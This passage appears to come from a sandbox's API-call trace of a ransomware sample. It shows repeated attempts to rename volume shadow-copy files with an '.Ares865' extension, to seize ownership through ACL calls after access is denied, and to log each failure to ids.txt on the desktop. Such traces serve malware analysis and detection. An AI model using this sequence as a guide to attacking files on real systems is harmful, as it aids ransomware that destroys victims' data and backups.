(hObject=0x0) returned 0 [0112.575] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x40efeae0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x40efeae0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x7f6a6ca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0xdd98000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9D3B9~1")) returned 1 [0112.575] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.575] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.575] GetLastError () returned 0x5 [0112.575] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.575] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.575] SetEntriesInAclW () returned 0x0 [0112.576] SetNamedSecurityInfoW () returned 0x5 [0112.576] SetNamedSecurityInfoW () returned 0x5 [0112.576] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.576] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.576] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.576] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x958a [0112.576] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.577] CloseHandle (hObject=0x118) returned 1 [0112.577] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.577] CloseHandle (hObject=0x0) returned 0 [0112.577] CloseHandle (hObject=0x0) returned 0 [0112.577] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7d3fcc40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x7d3fcc40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x71e0e9a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1588c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{93E0C~1")) returned 1 [0112.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.578] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.578] GetLastError () returned 0x5 [0112.578] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.578] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.578] SetEntriesInAclW () returned 0x0 [0112.578] SetNamedSecurityInfoW () returned 0x5 [0112.578] SetNamedSecurityInfoW () returned 0x5 [0112.578] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.578] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.578] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.579] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x961e [0112.579] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.585] CloseHandle (hObject=0x118) returned 1 [0112.585] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.586] CloseHandle (hObject=0x0) returned 0 [0112.586] CloseHandle (hObject=0x0) returned 0 [0112.586] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ea229c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6ea229c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x707e2180, ftLastWriteTime.dwHighDateTime=0x1d2fafa, nFileSizeHigh=0x0, nFileSizeLow=0x221bc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{97A6A~1")) returned 1 [0112.586] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.586] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.586] GetLastError () returned 0x5 [0112.586] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.586] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.586] SetEntriesInAclW () returned 0x0 [0112.586] SetNamedSecurityInfoW () returned 0x5 [0112.586] SetNamedSecurityInfoW () returned 0x5 [0112.587] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.587] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.587] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.587] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x96b2 [0112.587] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.588] CloseHandle (hObject=0x118) returned 1 [0112.588] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.588] CloseHandle (hObject=0x0) returned 0 [0112.588] CloseHandle (hObject=0x0) returned 0 [0112.588] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3c595fe0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x3c595fe0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa31628c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5da18000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B426F~1")) returned 1 [0112.588] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.589] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.589] GetLastError () returned 0x5 [0112.589] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.589] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.589] SetEntriesInAclW () returned 0x0 [0112.589] SetNamedSecurityInfoW () returned 0x5 [0112.589] SetNamedSecurityInfoW () returned 0x5 [0112.589] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.589] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.589] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.590] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9746 [0112.590] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.590] CloseHandle (hObject=0x118) returned 1 [0112.590] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.590] CloseHandle (hObject=0x0) returned 0 [0112.590] CloseHandle (hObject=0x0) returned 0 [0112.590] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa1602bc0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4a8c0a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7bfff000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B426F~2")) returned 1 [0112.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.591] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.591] GetLastError () returned 0x5 [0112.591] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.591] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.591] SetEntriesInAclW () returned 0x0 [0112.591] SetNamedSecurityInfoW () returned 0x5 [0112.591] SetNamedSecurityInfoW () returned 0x5 [0112.591] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.591] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.591] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.592] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97da [0112.592] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.592] CloseHandle (hObject=0x118) returned 1 [0112.592] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.592] CloseHandle (hObject=0x0) returned 0 [0112.592] CloseHandle (hObject=0x0) returned 0 [0112.592] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa574db90, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa574db90, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xb5d71250, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x24d8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B8DAA~1")) returned 1 [0112.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.593] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.593] GetLastError () returned 0x5 [0112.593] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.593] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.593] SetEntriesInAclW () returned 0x0 [0112.593] SetNamedSecurityInfoW () returned 0x5 [0112.593] SetNamedSecurityInfoW () returned 0x5 [0112.593] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.593] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.593] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.594] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x986e [0112.594] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.594] CloseHandle (hObject=0x118) returned 1 [0112.594] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.594] CloseHandle (hObject=0x0) returned 0 [0112.594] CloseHandle (hObject=0x0) returned 0 [0112.594] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xb29f7690, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb29f7690, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xc2d6d490, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x2db4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B8DAA~2")) returned 1 [0112.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.595] MoveFileExW (lpExistingFileName="C:\\System Volume 